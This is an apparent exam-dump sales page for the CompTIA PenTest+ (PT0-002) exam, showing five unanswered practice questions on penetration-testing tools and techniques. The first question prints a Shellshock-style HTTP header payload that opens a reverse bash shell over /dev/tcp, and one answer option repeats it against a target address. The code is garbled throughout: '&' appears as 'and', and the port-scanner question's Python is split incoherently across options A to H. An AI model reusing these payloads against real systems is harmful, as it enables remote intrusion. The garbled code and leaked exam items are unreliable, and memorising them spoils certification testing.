Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Updated:
Q&As: 403
At Passcerty.com, we pride ourselves on the comprehensive nature of our PT0-002 exam dumps, designed meticulously to encompass all key topics and nuances you might encounter during the real examination. Regular updates are a cornerstone of our service, ensuring that our dedicated users always have their hands on the most recent and relevant Q&A dumps. Behind every meticulously curated question and answer lies the hard work of our seasoned team of experts, who bring years of experience and knowledge into crafting these premium materials. And while we are invested in offering top-notch content, we also believe in empowering our community. As a token of our commitment to your success, we're delighted to offer a substantial portion of our resources for free practice. We invite you to make the most of the following content, and wish you every success in your endeavors.
Experience Passcerty.com exam material in PDF version.
Simply submit your e-mail address below to get started with our PDF real exam demo of your CompTIA PT0-002 exam.
Instant download
Latest update demo according to real exam
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/127.0.0.1/9090 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/10.10.1.1/80” 0>and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?
A. GDB
B. Burp Suite
C. SearchSpliot
D. Netcat
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
A. Crawling the web application's URLs looking for vulnerabilities
B. Fingerprinting all the IP addresses of the application's servers
C. Brute forcing the application's passwords
D. Sending many web requests per second to test DDoS protection
During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?
A. fori in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(fPort {i} OPEN')
B. close ()
C. fori in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn =
D. connect--ex((host_IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close ()
E. fori in range(1000, 2001): s = socket(AF--INET, SOCK_DGRAM) conn =
F. connect--ex((host_IP, i)) if (conn == 0): print(f'Port {i} OPEN') s.close ()
G. fori in range (1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn =
H. connect--ex((host--IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close()
Viewing Page 1 of 3 pages. Download PDF or Software version with 403 questions